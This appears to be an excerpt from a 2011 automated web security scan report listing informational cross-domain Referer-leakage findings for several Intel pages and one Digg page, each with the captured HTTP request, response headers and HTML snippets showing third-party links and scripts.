  • http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js
  • http://cdn3.diggstatic.com/js/lib.56731306.js
  • http://www.surveymonkey.com/s/ZNBQMYJ

Request

GET /submit?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=15436670eec4b706dbd3007684ea2ebb76af60eb4cc681ce1bc0e799ee3bcc18; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21375 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">

<link rel="shortcut icon" href="http://cdn1.diggstatic.com/img/favicon.a015f25c.ico">


<link rel="stylesheet" type="text/css" href="http://cdn3.diggstatic.com/css/library/global.16354f29.css" media="all">
<!--[if IE 7]>
...[SNIP]...
<![endif]-->

<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/App_Submission/index.c3c738bb.css" media="all">

<script type='text/javascript'>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.surveymonkey.com/s/ZNBQMYJ" id="feedback-bar-survey">Take the survey</a>
...[SNIP]...
</div>
<script src="http://cdn3.diggstatic.com/js/lib.56731306.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

17.6. http://downloadcenter.intel.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloadcenter.intel.com
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string:
  • http://downloadcenter.intel.com/default.aspx?iid=gg_support-EN_01+home_downloadctr
The response contains the following links to other domains:
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.youtube.com/p/8D0CC2A76B476A7E?hl=en_US&fs=1

Request

GET /default.aspx?iid=gg_support-EN_01+home_downloadctr HTTP/1.1
Host: downloadcenter.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:17:39 GMT
Server: Microsoft-IIS/6.0
P: S4
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=agsokb3iaxti4o55i3gpx5vd; path=/; HttpOnly
Set-Cookie: IntelDownloadCenterLocale=en-US; expires=Sun, 05-Feb-2012 23:17:39 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22403
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" dir="
...[SNIP]...
<param name="allowscriptaccess" value="always"/><embed allowfullscreen="true" allowscriptaccess="always" height="250" src="http://www.youtube.com/p/8D0CC2A76B476A7E?hl=en_US&amp;fs=1" type="application/x-shockwave-flash" width="300"></embed>
...[SNIP]...
<li>
<a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.7. http://edc.intel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edc.intel.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://edc.intel.com/?iid=gg_work+home_edc
The response contains the following links to other domains:
  • http://api.tweetmeme.com/button.js?url=http%3a%2f%2fedc.intel.com%2fdefault.aspx%3fiid%3dgg_work%2bhome_edc&style=compact&service=bit.ly
  • http://digg.com/submit?url=http%3a%2f%2fedc.intel.com%2fdefault.aspx%3fiid%3dgg_work%2bhome_edc&title=Intel.. Embedded Design Center
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://twitter.com/Geek8ive/Embassadors
  • http://widgets.digg.com/buttons.js
  • http://www.addthis.com/bookmark.php?v=250&username=sgrogan
  • http://www.facebook.com/plugins/like.php?locale=en_US&href=http%3a%2f%2fedc.intel.com%2fdefault.aspx%3fiid%3dgg_work%2bhome_edc&layout=button_count&show_faces=false&width=149&action=recommend&colorscheme=light&height=21
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.youtube.com/user/channelintel

Request

GET /?iid=gg_work+home_edc HTTP/1.1
Host: edc.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=eb5lkr2a0mtj1u45d2vcsvm2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:17:23 GMT
Connection: close
Content-Length: 71062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00
...[SNIP]...
<li class="facebook">
           <iframe src="http://www.facebook.com/plugins/like.php?locale=en_US&href=http%3a%2f%2fedc.intel.com%2fdefault.aspx%3fiid%3dgg_work%2bhome_edc&layout=button_count&show_faces=false&width=149&action=recommend&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border: none; overflow: hidden; width: 150px; height: 21px;" allowtransparency="true"></iframe>
...[SNIP]...
<li class="retweet">
       <iframe src="http://api.tweetmeme.com/button.js?url=http%3a%2f%2fedc.intel.com%2fdefault.aspx%3fiid%3dgg_work%2bhome_edc&style=compact&service=bit.ly" height="20" width="90" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
...[SNIP]...
<li class="digg">
       <script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
       <a id="ctl00_ContentPlaceHolder_SocialMediaBar_DiggHyperLink" class="DiggThisButton DiggCompact" href="http://digg.com/submit?url=http%3a%2f%2fedc.intel.com%2fdefault.aspx%3fiid%3dgg_work%2bhome_edc&amp;amp;title=Intel.. Embedded Design Center"></a>
...[SNIP]...
<!-- AddThis Button BEGIN -->
<a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=250&amp;username=sgrogan"><img title="Bookmark and Share" src="http://edc-cache.intel.com/App_Shared/Pix/en-us/Button-AddThis.gif" alt="Bookmark and Share" style="height:16px;width:81px;border-width:0px;" /></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=sgrogan"></script>
...[SNIP]...
<div id="EDC-default-left-community-twitter"><a href="http://twitter.com/Geek8ive/Embassadors" target="_edc"><img title="Intel.. Embedded on Twitter*" src="http://edc-cache.intel.com/App_Shared/Pix/Icon-Twitter.gif" alt="Intel.. Embedded on Twitter*" style="height:18px;width:18px;border-width:0px;" />
...[SNIP]...
<div id="EDC-default-left-community-youtube"><a href="http://www.youtube.com/user/channelintel" target="_edc"><img title="Intel on YouTube*" src="http://edc-cache.intel.com/App_Shared/Pix/Icon-YouTube.gif" alt="Intel on YouTube*" style="height:18px;width:41px;border-width:0px;" />
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.8. http://inside.intel.com/LOPFeedMashup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPFeedMashup

Issue detail

The page was loaded from a URL containing a query string:
  • http://inside.intel.com/LOPFeedMashup?ON=runMashup&SN=LOPMASHUP05&STARTINDEX=1
The response contains the following links to other domains:
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/0BW_AD9fx7A/
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/29IACAhv-Ww/
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/2wncIJ6V3DU/
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/5A555UrxOrM/
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/TnZkODgVA7M/
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/ZV54eCa9Ay4/
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/auB3T_bZaDs/
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/kD9DcSAv5dA/
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/lrvRGbzI4z8/
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/s7BMh6igefM/location-awareness-demo-qt-creator-using-qml
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/viggzvvDHdw/
  • http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/xjRO9kXYt6Q/join-us-our-arizona-application-lab-learn-about-app-development-meego

Request

GET /LOPFeedMashup?ON=runMashup&SN=LOPMASHUP05&STARTINDEX=1 HTTP/1.1
Host: inside.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Apache
serviceURL: http://inside.intel.com:80/presto/edge/api/rest/LOPFeedMashup/Invoke?presto_user=$session/username&presto_password=$session/password&SN%253DLOPMASHUP05%2526DT%253DCLOB%2526SIP%253D%2526STARTINDEX%253D1%2526COUNT%253D%2526CF%253Dcached%2526ON%253DrunMashup
Content-Language: en-US
CacheHit: D=392244 t=1296914649343060
Content-Type: text/xml;charset=UTF-8
Cache-Control: max-age=9928
Expires: Sun, 06 Feb 2011 02:06:53 GMT
Date: Sat, 05 Feb 2011 23:21:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55849

<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmln
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/auB3T_bZaDs/"
rel="alternate"/>

<category term="Uncategorized"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/2wncIJ6V3DU/"
rel="alternate"/>

<category term="Parallel Programming"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/s7BMh6igefM/location-awareness-demo-qt-creator-using-qml"
rel="alternate"/>

<category term="Intel.. AppUp Developer Program"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/0BW_AD9fx7A/"
rel="alternate"/>

<category term="Graphics &amp; Media"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/29IACAhv-Ww/"
rel="alternate"/>

<category term="Intel SW Partner Program"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/TnZkODgVA7M/"
rel="alternate"/>

<category term="Manageability..&amp;..Security"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/ZV54eCa9Ay4/"
rel="alternate"/>

<category term="Academic"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/viggzvvDHdw/"
rel="alternate"/>

<category term="Manageability..&amp;..Security"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/lrvRGbzI4z8/"
rel="alternate"/>

<category term="Parallel Programming"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/kD9DcSAv5dA/"
rel="alternate"/>

<category term="Academic"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/xjRO9kXYt6Q/join-us-our-arizona-application-lab-learn-about-app-development-meego"
rel="alternate"/>

<category term="Events"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/xjRO9kXYt6Q/join-us-our-arizona-application-lab-learn-about-app-development-meego"
rel="alternate"/>

<category term="Events"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/xjRO9kXYt6Q/join-us-our-arizona-application-lab-learn-about-app-development-meego"
rel="alternate"/>

<category term="Events"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/xjRO9kXYt6Q/join-us-our-arizona-application-lab-learn-about-app-development-meego"
rel="alternate"/>

<category term="Events"/>
...[SNIP]...
</title>
<link href="http://feedproxy.google.com/~r/IntelSoftwareNetworkBlog/~3/5A555UrxOrM/"
rel="alternate"/>

<category term="Manageability..&amp;..Security"/>
...[SNIP]...

17.9. http://itcenter.intel.com/ResourceLibrary  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itcenter.intel.com
Path:   /ResourceLibrary

Issue detail

The page was loaded from a URL containing a query string:
  • http://itcenter.intel.com/ResourceLibrary?iid=subhdr+itc_library
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /ResourceLibrary?iid=subhdr+itc_library HTTP/1.1
Host: itcenter.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:22:32 GMT
Connection: close
Content-Length: 69656


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US">
<head><met
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.10. http://newsroom.intel.com/archive.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /archive.jspa

Issue detail

The page was loaded from a URL containing a query string:
  • http://newsroom.intel.com/archive.jspa?view=archive&community=2016
The response contains the following links to other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /archive.jspa?view=archive&community=2016 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:06 GMT
Server: Apache
X-JAL: 157
Content-Language: en-US
CacheHit: D=183005 t=1296947706205908
X-JSL: D=183011 t=1296947706205908
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

17.11. http://newsroom.intel.com/community/feeds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/feeds

Issue detail

The page was loaded from a URL containing a query string:
  • http://newsroom.intel.com/community/feeds?community=2016
The response contains the following links to other domains:
  • http://en.wikipedia.org/wiki/Aggregator
  • http://en.wikipedia.org/wiki/RSS
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /community/feeds?community=2016 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:29 GMT
Server: Apache
X-JAL: 7
Content-Language: en-US
CacheHit: D=14467 t=1296947669518521
X-JSL: D=14472 t=1296947669518521
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<p><a href="http://en.wikipedia.org/wiki/RSS">RSS</a>
...[SNIP]...
<p>To view RSS feeds you use an RSS reader (also known as an "<a href="http://en.wikipedia.org/wiki/Aggregator">aggregator</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

17.12. http://newsroom.intel.com/community/intel_newsroom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom

Issue detail

The page was loaded from a URL containing a query string:
  • http://newsroom.intel.com/community/intel_newsroom?view=overview
The response contains the following links to other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://twitter.com/intel
  • http://twitter.com/intelnews
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=

Request

GET /community/intel_newsroom?view=overview HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:23 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313935393b33382c313934363b33382c313936303b33382c313931393b33382c313936333b31342c323031363b31342c323032353b; Expires=Mon, 07-Mar-2011 23:14:26 GMT; Path=/
X-JAL: 807
Content-Language: en-US
CacheHit: D=817544 t=1296947663588341
X-JSL: D=817549 t=1296947663588341
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
